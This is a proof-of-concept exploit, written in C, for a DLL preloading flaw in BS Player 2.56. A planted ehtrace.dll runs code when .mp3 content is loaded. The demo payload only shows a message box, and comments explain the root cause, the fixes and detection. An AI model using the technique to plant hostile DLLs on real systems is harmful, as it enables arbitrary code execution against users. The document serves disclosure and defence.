BS Player version 2.56 DLL hijacking exploit.
1138e666e26d184783548561e62217e74722851cbc6da3b4fc0a1c1b81932324
/*
Description: BS Player 2.56 is vulnerable to another DLL preloading issue, this time via ehtrace.dll, while loading .mp3 content.
Date: August 29, 2010
Author: Classity Security Scans (http://www.classity.nl/)
PoC: Displaying message box, but can be replaced by DLL with arbitrary payload.
*/
#include <windows.h>
#define DllExport __declspec (dllexport)
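/* Prototype for the helper defined further down. DllMain calls it before its
 * definition, which would otherwise be an implicit function declaration
 * (rejected by C99 and later). */
int dll_pl(void);

/*
 * DLL entry point of the proof-of-concept library.
 *
 * The loader calls this function as soon as the host process maps the DLL,
 * so the call to dll_pl() shows that code supplied in a look-alike
 * ehtrace.dll runs inside the media player with the user's privileges.
 *
 * Parameters (all unused here):
 *   hinstDLL    - module handle of this DLL.
 *   fdwReason   - notification code (process/thread attach or detach).
 *   lpvReserved - loader-supplied context.
 *
 * Returns 0 (FALSE). For a process-attach notification that reports failed
 * initialization to the loader, so the DLL does not stay loaded; the message
 * box has already been displayed by then.
 *
 * Notes for reviewers and defenders:
 *   - fdwReason is not inspected, so dll_pl() runs on every notification the
 *     loader delivers, not only on process attach.
 *   - Calling a USER32 function such as MessageBox from DllMain happens
 *     under the loader lock; Microsoft's DllMain guidance advises against it.
 *     It is tolerable only because this is a throw-away demonstration.
 *   - The root cause is in the host application: it loads a DLL by bare name
 *     and lets the search order reach a directory the attacker can write to.
 *     Applications avoid this by loading from a fully qualified path or by
 *     restricting the search path (SetDefaultDllDirectories, LoadLibraryEx
 *     with the LOAD_LIBRARY_SEARCH_* flags, SetDllDirectory("")).
 *   - Detection: alert on image loads of ehtrace.dll from a directory other
 *     than its expected install location, e.g. next to a media file.
 */
BOOL WINAPI DllMain (
    HANDLE hinstDLL,
    DWORD fdwReason,
    LPVOID lpvReserved)
{
    /* Silence unused-parameter warnings; the PoC ignores all three. */
    (void)hinstDLL;
    (void)fdwReason;
    (void)lpvReserved;

    dll_pl();
    return 0;
}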
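/*
 * Visible marker for the proof of concept: shows a modal message box so the
 * tester can confirm that the planted DLL was loaded and executed by the
 * player.
 *
 * The original text named "Virtual DJ", left over from a different
 * advisory; it now names the product this PoC is about, so a screenshot of
 * the dialog cannot be attributed to the wrong application.
 *
 * Returns 0 unconditionally; the result of MessageBoxA is not checked.
 */
int dll_pl(void)
{
    /* MessageBoxA is called explicitly because the arguments are narrow
     * string literals; the MessageBox macro maps to MessageBoxW when UNICODE
     * is defined, which would not accept them. */
    MessageBoxA(NULL, "BS Player Vulnerable for DLL Preloading!", "DLL Message", MB_OK);
    return 0;
}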